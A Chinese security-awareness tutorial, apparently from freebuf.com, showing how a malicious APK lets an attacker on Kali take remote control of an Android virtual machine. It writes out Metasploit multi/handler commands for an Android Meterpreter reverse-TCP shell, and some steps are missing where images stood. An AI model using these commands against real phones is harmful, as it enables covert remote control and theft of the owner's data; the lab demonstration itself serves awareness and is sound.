如何使用Metasploit对安卓手机进行控制
现在大家每天的生活都离不开一样东西——手机。手机上的App给我们的生活带来了许多欢乐与便利,让我们足不出户便能知晓天下事。然而,并不是所有App都是为我们服务的,有些App可能会带着恶意去接近我们。如果你的程序是从官方应用商店下载还比较安全,若是从未知来源,如网上论坛,或者他人转发等“不靠谱”的下载链接安装,那就比较危险了。所以大部分安卓手机在你设置“允许安装未知来源App”时都会弹出如下提醒:

下面,我就会以一个恶意攻击者的角度来告诉你,未知来源的App有多危险!
环境:
攻击机:Kali
靶机(受害者):FreeBSD安卓4.4.2虚拟机
过程:
首先我们查看并记录Kali的ip地址:192.168.1.112.



use exploit/multi/handler
set Payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.112
set LPORT 4444

输入exploit,等待结果。
现在,我们开始模仿受害者,通过电子邮件收到了一个未知来源的apk,名称为“hh.apk”。





总结:
看到这里,相信各位已经对未知来源的应用程序产生了一丝畏惧。希望大家尽量能从官方下载应用程序使用,不要安装和使用来源不明的apk或是软件,对自己的信息安全有更多一点的防范意识。
来源:freebuf.com 2019-01-22 21:17:21 by: 凯信特安全团队

